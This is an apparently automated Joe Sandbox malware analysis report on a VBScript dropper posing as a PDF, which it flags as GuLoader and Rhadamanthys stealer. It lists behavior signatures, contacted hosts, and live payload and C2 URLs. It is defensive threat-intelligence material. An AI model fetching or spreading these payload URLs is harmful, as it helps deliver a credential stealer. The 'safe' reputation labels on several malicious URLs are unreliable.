                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                        Process Injection                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571840 Sample: List of required items and ... Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 68 www.tequila.ae 2->68 70 www.tdejb.com 2->70 72 17 other IPs or domains 2->72 96 Suricata IDS alerts for network traffic 2->96 98 Malicious sample detected (through community Yara rule) 2->98 100 Yara detected RHADAMANTHYS Stealer 2->100 102 10 other signatures 2->102 11 powershell.exe 15 2->11         started        14 wscript.exe 1 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 dnsIp5 112 Early bird code injection technique detected 11->112 114 Writes to foreign memory regions 11->114 116 Found suspicious powershell code related to unpacking or dynamic code loading 11->116 118 Queues an APC in another process (thread injection) 11->118 19 msiexec.exe 11->19         started        23 conhost.exe 11->23         started        120 VBScript performs obfuscated calls to suspicious functions 14->120 122 Suspicious powershell command line found 14->122 124 Wscript starts Powershell (via cmd or directly) 14->124 126 2 other signatures 14->126 25 powershell.exe 20 19 14->25         started        66 127.0.0.1 unknown unknown 16->66 signatures6 process7 dnsIp8 74 tdejb.com 202.71.109.228, 443, 49754 TMVADS-APTM-VADSDCHostingMY Malaysia 19->74 104 Switches to a custom stack to bypass stack traces 19->104 28 svchost.exe 19->28         started        76 tequila.ae 209.124.66.28, 443, 49730 A2HOSTINGUS United States 25->76 78 fornid.com 93.95.216.175, 443, 49739 SERVERPLAN-ASIT Italy 25->78 62 C:\Users\Public\udkz59n9.vbs, ASCII 25->62 dropped 64 C:\Users\Public\lsm5k8gou5bjv.xlsx, Microsoft 25->64 dropped 106 Found suspicious powershell code related to unpacking or dynamic code loading 25->106 32 wscript.exe 1 25->32         started        34 EXCEL.EXE 35 68 25->34         started        36 conhost.exe 25->36         started        file9 signatures10 process11 dnsIp12 90 45.149.241.141, 2023, 443, 49765 UUNETUS Germany 28->90 128 System process connects to network (likely due to code injection or exploit) 28->128 130 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->130 132 Switches to a custom stack to bypass stack traces 28->132 38 svchost.exe 28->38         started        134 Suspicious powershell command line found 32->134 136 Wscript starts Powershell (via cmd or directly) 32->136 42 WMIC.exe 1 32->42         started        44 powershell.exe 18 32->44         started        46 splwow64.exe 34->46         started        signatures13 process14 dnsIp15 82 ntp1.net.berkeley.edu 169.229.128.134, 123, 65339 UCBUS United States 38->82 84 x.ns.gin.ntt.net 129.250.35.250, 123, 65339 NTT-COMMUNICATIONS-2914US United States 38->84 88 4 other IPs or domains 38->88 108 Tries to harvest and steal browser information (history, passwords, etc) 38->108 48 wmpshare.exe 38->48         started        51 chrome.exe 38->51         started        110 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 42->110 54 conhost.exe 42->54         started        86 ftsengineers.com 103.53.42.63, 443, 49732 PUBLIC-DOMAIN-REGISTRYUS India 44->86 56 conhost.exe 44->56         started        signatures16 process17 dnsIp18 92 Writes to foreign memory regions 48->92 94 Allocates memory in foreign processes 48->94 58 dllhost.exe 48->58         started        80 239.255.255.250 unknown Reserved 51->80 60 chrome.exe 51->60         started        signatures19 process20

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        List of required items and services pdf.vbs0%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://ftsengineers.com0%Avira URL Cloudsafe
                        https://www.ftsengineers.com0%Avira URL Cloudsafe
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glSymb0%Avira URL Cloudsafe
                        https://www.tdejb.com/a0%Avira URL Cloudsafe
                        https://www.tequila.ae/wh/wh.vbs0%Avira URL Cloudsafe
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        https://www.tdejb.com/0%Avira URL Cloudsafe
                        http://tequila.ae0%Avira URL Cloudsafe
                        https://www.puneet.ae/it/Emnernes123.mdp0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.binIdensUndwww.tequila.ae/ab/ab.bin0%Avira URL Cloudsafe
                        http://crl.mH/~s0%Avira URL Cloudsafe
                        http://www.tequila.ae0%Avira URL Cloudsafe
                        https://www.tequila.ae0%Avira URL Cloudsafe
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glkernelbasentdllkernel32GetProcessMitig0%Avira URL Cloudsafe
                        http://www.ftsengineers.com0%Avira URL Cloudsafe
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glx0%Avira URL Cloudsafe
                        https://www.ftsengineers.com/it/Emnernes123.mdp0%Avira URL Cloudsafe
                        http://microsoft.coo0%Avira URL Cloudsafe
                        http://crl.mH/~0%Avira URL Cloudsafe
                        https://www.puneet.ae/it/Emnernes123.mdpt0%Avira URL Cloudsafe
                        https://www.fornid.com/ab/List0%Avira URL Cloudsafe
                        http://127.0.0.1:8000/a9b905ba/4a1b3c1a0%Avira URL Cloudsafe
                        https://www.fornid.com/ab/List%20of%20required%20items.xlsx0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.210.172
                        		truefalse
                          		high
                          ntp.nict.jp
                          		133.243.238.244
                          		truefalse
                            		high
                            gbg1.ntp.netnod.se
                            		194.58.203.20
                            		truefalse
                              		unknown
                              x.ns.gin.ntt.net
                              		129.250.35.250
                              		truefalse
                                		high
                                fornid.com
                                		93.95.216.175
                                		truefalse
                                  		high
                                  ntp1.net.berkeley.edu
                                  		169.229.128.134
                                  		truefalse
                                    		unknown
                                    tequila.ae
                                    		209.124.66.28
                                    		truetrue
                                      		unknown
                                      tdejb.com
                                      		202.71.109.228
                                      		truefalse
                                        		unknown
                                        s-part-0035.t-0009.t-msedge.net
                                        		13.107.246.63
                                        		truefalse
                                          		high
                                          ftsengineers.com
                                          		103.53.42.63
                                          		truefalse
                                            		unknown
                                            time.facebook.com
                                            		129.134.25.123
                                            		truefalse
                                              		high
                                              ntp1.hetzner.de
                                              		213.239.239.164
                                              		truefalse
                                                		unknown
                                                gbg1.ntp.se
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.ftsengineers.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.fornid.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      time.windows.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        www.tequila.ae
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.tdejb.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://www.tdejb.com/ab/ab.binfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.tequila.ae/wh/wh.vbstrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.ftsengineers.com/it/Emnernes123.mdpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.fornid.com/ab/List%20of%20required%20items.xlsxtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabsvchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ftsengineers.compowershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E35A382000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.microsoft.copowershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://discordapp.comsvchost.exe, 00000012.00000003.2510722230.000002435DC0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510675719.000002435DC0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://ftsengineers.compowershell.exe, 00000006.00000002.1849625664.000001E35A388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crl.mH/~spowershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.tdejb.com/msiexec.exe, 00000010.00000002.2268662675.00000000050AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://tequila.aepowershell.exe, 00000001.00000002.2955122133.000001CC34CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000F.00000003.1964293277.0000027BC5AA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000F.00000003.1964293277.0000027BC5A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glsvchost.exe, svchost.exe, 00000012.00000002.2783183945.000002435DCD1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2783151962.000002435DCCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.tdejb.com/amsiexec.exe, 00000010.00000002.2268662675.00000000050AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://aka.ms/pscore6lBpowershell.exe, 00000009.00000002.2092971227.0000000004201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glSymbsvchost.exe, 00000012.00000002.2783183945.000002435DCD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3025434568.000001CC43750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3025434568.000001CC43886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC35117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.puneet.ae/it/Emnernes123.mdppowershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E359BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.microsoft.cpowershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.tdejb.com/ab/ab.binIdensUndwww.tequila.ae/ab/ab.binmsiexec.exe, 00000010.00000002.2269347949.00000000053E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2955122133.000001CC336D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3585F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2092971227.0000000004201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.tequila.aepowershell.exe, 00000001.00000002.2955122133.000001CC342FC000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.tequila.aepowershell.exe, 00000001.00000002.2955122133.000001CC34CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.ftsengineers.compowershell.exe, 00000006.00000002.1849625664.000001E35A388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3025434568.000001CC43750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3025434568.000001CC43886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC35117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://discord.comsvchost.exe, 00000012.00000003.2510722230.000002435DC0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510675719.000002435DC0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glxsvchost.exe, 00000011.00000002.2356157723.00000000032BC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://go.micropowershell.exe, 00000001.00000002.2955122133.000001CC342FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3591BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glkernelbasentdllkernel32GetProcessMitigsvchost.exe, 00000011.00000003.2355766793.000000000370C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://cloudflare-dns.com/dns-querysvchost.exe, 00000011.00000003.2287273703.000000000379F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.ver)svchost.exe, 0000000F.00000002.2958981492.0000027BC5800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.fornid.compowershell.exe, 00000001.00000002.2955122133.000001CC34CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachisvchost.exe, 00000011.00000003.2287273703.000000000379F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://microsoft.coopowershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.ecosia.org/newtab/svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.mH/~powershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fornid.compowershell.exe, 00000001.00000002.2955122133.000001CC35088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.puneet.ae/it/Emnernes123.mdptpowershell.exe, 00000009.00000002.2092971227.0000000004355000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.mpowershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.fornid.com/ab/Listpowershell.exe, 00000001.00000002.2955122133.000001CC34CE7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.2955122133.000001CC336D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3585F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://127.0.0.1:8000/a9b905ba/4a1b3c1asvchost.exe, 00000012.00000003.2510299112.000002435DC13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://fornid.compowershell.exe, 00000001.00000002.2955122133.000001CC35088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      194.58.203.20
                                                                                                                                      		gbg1.ntp.netnod.seSweden
                                                                                                                                      		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                                                                                      169.229.128.134
                                                                                                                                      		ntp1.net.berkeley.eduUnited States
                                                                                                                                      		25UCBUSfalse
                                                                                                                                      129.134.25.123
                                                                                                                                      		time.facebook.comUnited States
                                                                                                                                      		32934FACEBOOKUSfalse
                                                                                                                                      133.243.238.244
                                                                                                                                      		ntp.nict.jpJapan9355NICTNationalInstituteofInformationandCommunicationsTefalse
                                                                                                                                      202.71.109.228
                                                                                                                                      		tdejb.comMalaysia
                                                                                                                                      		17971TMVADS-APTM-VADSDCHostingMYfalse
                                                                                                                                      213.239.239.164
                                                                                                                                      		ntp1.hetzner.deGermany
                                                                                                                                      		24940HETZNER-ASDEfalse
                                                                                                                                      103.53.42.63
                                                                                                                                      		ftsengineers.comIndia
                                                                                                                                      		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                      129.250.35.250
                                                                                                                                      		x.ns.gin.ntt.netUnited States
                                                                                                                                      		2914NTT-COMMUNICATIONS-2914USfalse
                                                                                                                                      209.124.66.28
                                                                                                                                      		tequila.aeUnited States
                                                                                                                                      		55293A2HOSTINGUStrue
                                                                                                                                      45.149.241.141
                                                                                                                                      		unknownGermany
                                                                                                                                      		701UUNETUStrue
                                                                                                                                      239.255.255.250
                                                                                                                                      		unknownReserved
                                                                                                                                      		unknownunknownfalse
                                                                                                                                      93.95.216.175
                                                                                                                                      		fornid.comItaly
                                                                                                                                      		52030SERVERPLAN-ASITfalse

                                                                                                                                      Private

                                                                                                                                      IP
                                                                                                                                      127.0.0.1

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1571840
                                                                                                                                      Start date and time:2024-12-09 18:47:07 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 10m 7s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:List of required items and services pdf.vbs
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@39/18@14/13
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 37.5%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 65%
                                                                                                                                      • Number of executed functions: 205
                                                                                                                                      • Number of non-executed functions: 24
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .vbs

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 52.109.76.240, 52.109.28.47, 52.113.194.132, 23.218.208.109, 20.189.173.10, 40.81.94.65, 17.253.18.99, 17.253.14.251, 17.253.18.131, 216.58.208.227, 172.217.19.238, 64.233.162.84, 4.175.87.197, 40.126.53.15, 13.107.246.63
                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, twc.trafficmanager.net, clientservices.googleapis.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, time.g.aaplimg.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, time.apple.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, uks-azsc-000
                                                                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 5316 because there are no executed function
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7260 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7924 because it is empty
                                                                                                                                      • Execution Graph export aborted for target svchost.exe, PID 4820 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • VT rate limit hit for: List of required items and services pdf.vbs

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      12:47:58API Interceptor4520543x Sleep call for process: powershell.exe modified
                                                                                                                                      12:48:04API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                                                      12:48:05API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                      12:48:28API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                      12:49:30API Interceptor316x Sleep call for process: splwow64.exe modified
                                                                                                                                      12:49:41API Interceptor1x Sleep call for process: wmpshare.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      194.58.203.20ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                        download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          213.239.239.164payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                            List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                  169.229.128.134wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                    103.53.42.63S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          https://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            http://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                                                                                                                              Linux_x86Get hashmaliciousUnknownBrowse
                                                                                                                                                                209.124.66.28List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                    https://amdat-my.sharepoint.com/:o:/g/personal/mai_amd_at/EoDy7F40M29Hj1IohtQ4kIQBoQXIpIg2xex0MiXjURHhng?e=a92LfUGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      https://url.us.m.mimecastprotect.com/s/KCOEC2kqvrf0N8VsnT72v?bWV5ZXJzZXJ2aWNlcw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                        XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
